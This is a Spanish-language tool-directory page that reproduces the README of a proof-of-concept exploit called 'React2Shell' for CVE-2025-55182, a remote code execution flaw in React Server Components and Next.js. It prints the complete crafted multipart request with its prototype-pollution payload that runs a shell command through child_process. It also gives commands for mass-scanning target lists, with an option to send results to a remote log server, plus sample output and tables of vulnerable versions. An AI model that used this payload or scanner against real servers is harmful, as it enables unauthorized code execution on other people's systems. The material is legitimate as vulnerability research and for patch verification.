Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell es un exploit de prueba de concepto para CVE-2025-55182 que afecta a implementaciones vulnerables de React Server Components (RSC) en Next.js | Kitploit
Herramientas/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell es un exploit de prueba de concepto para CVE-2025-55182 que afecta a implementaciones vulnerables de React Server Components (RSC) en Next.js

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 27 díasAún no revisado

💀 Exploit React2Shell — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 Ejecución Remota de Código en React Server Components

CVE-2025-55182

Escrito por INDRA


⚠️ Descargo de Responsabilidad

Este proyecto se proporciona únicamente con fines educativos, de investigación de seguridad y pruebas de penetración autorizadas.

El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este software.

Utilice este exploit únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba.


📖 Descripción

React2Shell es un exploit de prueba de concepto para CVE-2025-55182 que afecta a implementaciones vulnerables de React Server Components (RSC) en Next.js.

El exploit envía una solicitud multipart manipulada que abusa del flujo vulnerable de deserialización y extrae la salida de comandos a través de la respuesta de digest de redirección de la aplicación.

Cuando tiene éxito, el exploit muestra directamente en la terminal la salida del comando ejecutado.


✨ Características

  • 🚀 Modo de objetivo único
  • 🌍 Modo de escaneo masivo
  • 🔄 Detección automática de HTTP y HTTPS
  • ⚡ Ejecución multihilo
  • 📝 Registro local opcional
  • 🌐 Servidor de registro remoto opcional
  • 🎯 Salida limpia
  • 🛡 Verificación SSL deshabilitada (para entornos de prueba)
  • 📂 Eliminación de objetivos duplicados

📦 Requisitos

Python 3.8+

Instalar dependencias:

root@kitploit:~
pip install requests urllib3

📁 Estructura del Proyecto

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 Versiones Vulnerables

React


Next.js

Vulnerables

  • 14.3.0-canary.77 y posteriores
  • 15.x
  • 16.x

Parcheadas

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 Solicitud HTTP Utilizada

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 Uso

Mostrar Ayuda

root@kitploit:~
python exploit.py -h

Escanear Un Objetivo

root@kitploit:~
python exploit.py -u https://target.com

Escanear Múltiples Objetivos

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

Ejecutar

root@kitploit:~
python exploit.py -f targets.txt

Guardar Resultados

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

Enviar Resultados al Servidor de Registro Remoto

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

Todo Junto

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 Opciones de Línea de Comandos


🖥 Salida de Ejemplo

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ Cómo Funciona

  1. Lee los objetivos
  2. Genera automáticamente URLs HTTP y HTTPS
  3. Envía una solicitud multipart manipulada
  4. Analiza el digest de redirección
  5. Extrae la salida del comando
  6. Muestra la explotación exitosa
  7. Opcionalmente, almacena los resultados de forma local o remota

📌 Notas

  • Prueba automáticamente HTTP y HTTPS cuando no se proporciona un esquema.
  • Los objetivos duplicados se eliminan automáticamente.
  • Usa 30 hilos concurrentes.
  • Ignora los certificados SSL no válidos.
  • El tiempo de espera (timeout) está configurado en 10 segundos.

❤️ Créditos

  • Desarrollo del Exploit: INDRA
  • CVE: CVE-2025-55182

⚖️ Aviso Legal

El uso no autorizado de este software contra sistemas sin permiso puede violar leyes locales, nacionales o internacionales.

El autor no es responsable de ningún mal uso.


⭐ Si este proyecto ayudó en tu investigación, considera darle una estrella.

Feliz caza 🕷️

Descargar herramienta
VersiónEstado
19.0⚠ Vulnerable
19.1.0⚠ Vulnerable
19.1.1⚠ Vulnerable
19.2.0⚠ Vulnerable
19.0.1✅ Parcheada
19.1.2✅ Parcheada
19.2.1✅ Parcheada
OpciónDescripción
-uURL del objetivo
-fArchivo que contiene los dominios objetivo
-oGuardar objetivos vulnerables localmente
-lEnviar resultados al servidor de registro remoto
-hMostrar ayuda